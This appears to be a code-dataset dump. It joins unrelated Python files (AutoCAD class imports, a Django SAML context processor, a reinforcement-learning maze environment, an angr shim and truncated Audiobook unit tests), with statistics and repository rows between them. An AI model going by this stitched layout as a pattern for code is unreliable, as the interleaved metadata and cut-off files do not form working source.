from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderEnvironment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderGlobal
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ReservedStringEnumType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ResultBuffer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ResultBufferEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolvedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RevolveOptionsCheckRevolveCurveOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RigidSetTypeInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RotatedDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RotationAngle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Row
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RowsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RowType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SaveType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ScaleEstimationMethod
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Section
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionGeneration
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionHeight
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionHitTestInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSubItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionSymbol
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewArrowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewIdentifierPosition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SectionViewStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityActions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityAlgorithm
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SecurityParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SegmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SelectType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SequenceEnd
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadePlotResLevel
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadePlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ShadowSamplingMultiplier
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Shape
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SkyBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Solid3dMassProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SolidBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SourceType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Spline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SplineType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import StandardScaleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import StdScaleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubDMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentityType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SubentRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Sun
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Surface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SurfaceSliceResults
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SurfaceTrimInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsAlignOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweepOptionsCheckSweepCurveOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SweptSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTableEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymbolUtilityServices
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SymmetricConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangingEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import SystemVariableChangingEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Table
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableBreakFlowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableBreakOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableCellType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableContent
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableCopyOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableEnumeratorOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableFillOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableHitTestInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableHitTestType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyleFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableStyleOverride
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TableTemplate
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TangentConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAlignment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAlignmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAngleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAttachmentDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextAttachmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorColumns
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorCursor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorLocation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorParagraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorParagraphTab
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorSelection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorSelectionbase
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorStack
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextEditorWipeout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextHorizontalMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextStyleTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextStyleTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TextVerticalMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ThreePointAngleConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TimeZone
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Trace
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Transaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TransactionManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TransformOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TypedValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import TypeOfCoordinates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UcsTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UcsTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayFile
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayHost
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayItemCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayerCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayLayerState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnderlayReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Unit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitsConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitsValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UnitTypeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateAction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import UpdateOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex2dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Vertex3dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VertexRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VerticalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewBorder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Viewport
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewportTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewportTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewRepBlockReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewStyleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ViewTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Visibility
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import VisibilityOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import WblockNoticeEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import WblockNoticeEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Wipeout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Xline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Xrecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrecordEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefBeginOperationEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefBeginOperationEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefComandeeredEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefComandeeredEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefGraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefGraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefNotificationStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefOperation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefPreXrefLockFileEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefPreXrefLockFileEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefRedirectedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefRedirectedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandAbortedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandEndEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefSubCommandStartEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import XrefVetoableSubCommandEventArgs
| 78.808989 | 110 | 0.911285 | 4,978 | 56,112 | 9.700683 | 0.144235 | 0.265024 | 0.368089 | 0.603665 | 0.749845 | 0.749845 | 0 | 0 | 0 | 0 | 0 | 0.000394 | 0.050684 | 56,112 | 711 | 111 | 78.919831 | 0.906154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.002813 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
56db9198096c3d9a2690b23e6e8b5ca0f940cfc0 | 119 | py | Python | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | 1 | 2020-08-10T13:16:58.000Z | 2020-08-18T06:30:20.000Z | rr/context_processors.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | from django.conf import settings
def saml_login_url(request):
return {'SAML_LOGIN_URL': settings.SAML_LOGIN_URL}
| 19.833333 | 54 | 0.789916 | 18 | 119 | 4.888889 | 0.611111 | 0.306818 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12605 | 119 | 5 | 55 | 23.8 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
856246e009f12f448c1e1d25cacebd2f33445f52 | 7,821 | py | Python | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null | rllib/examples/quarkzou/maze/maze_env.py | quarkzou/ray | 49de29969df0c55a5969b8ffbfc7d62459e5024b | [
"Apache-2.0"
] | null | null | null | import gym
from gym.spaces import Discrete, Box
from ray.rllib.env.env_context import EnvContext
import numpy as np
import random
MAZE_SIZE = 4
MAZE_SHAPE = (4, 4)
TRAP1_POS = np.array([1, 1])
TRAP2_POS = np.array([2, 2])
EXIT_POS = np.array([2, 1])
# TREASURE_POS = np.array([2, 3])
TREASURE_POS = np.array([2, 3])
TREASURE_VALUE = 20.0
TRAP_VALUE = -10.0
EXIT_VALUE = 10.0
POS_VALUE = 1.0
class QuarkMaze(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(0, MAZE_SIZE - 1, shape=(2,), dtype=np.int8)
self.cur_pos = np.array([0, 0])
self.seed((config.worker_index + 1) * (config.num_workers + 1))
def reset(self):
self.cur_pos = np.array([0, 0])
return self.cur_pos
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
if (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
return self.cur_pos, reward, done, {}
def seed(self, seed=None):
random.seed(seed)
class QuarkMaze2(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(TRAP_VALUE, EXIT_VALUE, shape=MAZE_SHAPE, dtype=np.float32)
self.cur_pos = np.array([0, 0])
self.seed((config.worker_index + 1) * (config.num_workers + 1))
def create_obs(self):
obs = np.zeros(MAZE_SHAPE)
obs[TRAP1_POS[0]][TRAP1_POS[1]] = TRAP_VALUE
obs[TRAP2_POS[0]][TRAP2_POS[1]] = TRAP_VALUE
obs[EXIT_POS[0]][EXIT_POS[1]] = EXIT_VALUE
obs[self.cur_pos[0]][self.cur_pos[1]] = POS_VALUE
return obs
def reset(self):
self.cur_pos = np.array([0, 0])
return self.create_obs()
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
if (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
return self.create_obs(), reward, done, {}
def seed(self, seed=None):
random.seed(seed)
# 加入宝藏、PPO明显比DQN好,DQN在局部无限抖动
class QuarkMaze3(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(TRAP_VALUE, TREASURE_VALUE, shape=MAZE_SHAPE, dtype=np.float32)
self.cur_pos = np.array([0, 0])
self.seed((config.worker_index + 1) * (config.num_workers + 1))
self.treasure_status = True
self.epoch_reward = 0
def create_obs(self):
obs = np.zeros(MAZE_SHAPE)
obs[TRAP1_POS[0]][TRAP1_POS[1]] = TRAP_VALUE
obs[TRAP2_POS[0]][TRAP2_POS[1]] = TRAP_VALUE
obs[EXIT_POS[0]][EXIT_POS[1]] = EXIT_VALUE
if self.treasure_status:
obs[TREASURE_POS[0]][TREASURE_POS[1]] = TREASURE_VALUE
obs[self.cur_pos[0]][self.cur_pos[1]] = POS_VALUE
return obs
def reset(self):
self.cur_pos = np.array([0, 0])
self.treasure_status = True
return self.create_obs()
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
if (self.cur_pos == TREASURE_POS).all() and self.treasure_status:
self.treasure_status = False
reward = TREASURE_VALUE
elif (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
self.epoch_reward += reward
return self.create_obs(), reward, done, {}
def seed(self, seed=None):
random.seed(seed)
def test_env():
env_config = EnvContext({}, 0, num_workers=1)
env = QuarkMaze3(env_config)
obs = env.reset()
print(obs)
obs, reward, done, info = env.step(1)
print(obs, reward, done)
obs, reward, done, info = env.step(1)
print(obs, reward, done)
if __name__ == '__main__':
test_env()
| 33 | 100 | 0.528577 | 1,159 | 7,821 | 3.379638 | 0.072476 | 0.167986 | 0.23998 | 0.106714 | 0.836354 | 0.834057 | 0.834057 | 0.821802 | 0.820781 | 0.820781 | 0 | 0.056368 | 0.335379 | 7,821 | 236 | 101 | 33.139831 | 0.697191 | 0.167753 | 0 | 0.77907 | 0 | 0 | 0.001235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087209 | false | 0 | 0.02907 | 0 | 0.180233 | 0.017442 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8574a781d42bfc8186d262cf50911755fee91148 | 114 | py | Python | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print '... Importing simuvex/engines/vex/statements/dirty.py ...'
from angr.engines.vex.statements.dirty import *
| 38 | 65 | 0.763158 | 15 | 114 | 5.8 | 0.733333 | 0.229885 | 0.45977 | 0.574713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 114 | 2 | 66 | 57 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.342105 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 8 |
857b6991c02966e208934e7dcc176ccf01aaf696 | 12,783 | py | Python | tests/unit/test_audiobook.py | manishmeganathan/flask-audioserver | 5939df81495d8ba595c1585e85bdfb46a61c919c | [
"MIT"
] | 1 | 2021-07-24T20:56:24.000Z | 2021-07-24T20:56:24.000Z | tests/unit/test_audiobook.py | manishmeganathan/flask-audioserver | 5939df81495d8ba595c1585e85bdfb46a61c919c | [
"MIT"
] | 3 | 2021-05-22T08:00:07.000Z | 2021-05-22T08:02:18.000Z | tests/unit/test_audiobook.py | manishmeganathan/flask-audioserver | 5939df81495d8ba595c1585e85bdfb46a61c919c | [
"MIT"
] | 1 | 2021-07-24T20:56:33.000Z | 2021-07-24T20:56:33.000Z | """
Unit Test Module for the class Audiobook in the audiofiles package
Test Framework: pyTest
"""
import pytest
import datetime
from audiofiles import Audiobook
from audiofiles import MetadataValueError
def test_Audiobook():
"""
**GIVEN** a valid metadata dictionary for Audiobook\n
**WHEN** a new Audiobook is created\n
**THEN** check the type of Audiobook attributes and their values.
"""
# Test for valid metadata
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert audiobook.metadata['type'] == 'Audiobook'
def test_Song_missing_metadata():
"""
**GIVEN** an invalid metadata dictionary for Audiobook that is missing a key\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'duration' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'duration'"
# Test for 'name' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'name'"
# Test for 'author' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "name": "sample-book", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'author'"
# Test for 'author' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "name": "sample-book", "author": "author1"})
assert str(error.value) == "metadata value is missing for 'narrator'"
def test_Audiobook_invalid_name():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'name' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'name' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": 20, "author": "author1",
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'name' - not an str"
# Test for 'name' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book" * 20, "author": "author1",
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'name' - str too long"
def test_Song_invalid_duration():
"""
**GIVEN* an invalid metadata dict for Audiobook that has an invalid 'duration' parameter\n
**WHEN* a new Audiobook is created\n
**THEN* check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'duration' field not an int
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "duration": 45.3,
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'duration' - not an int"
# Test for 'duration' field not positive
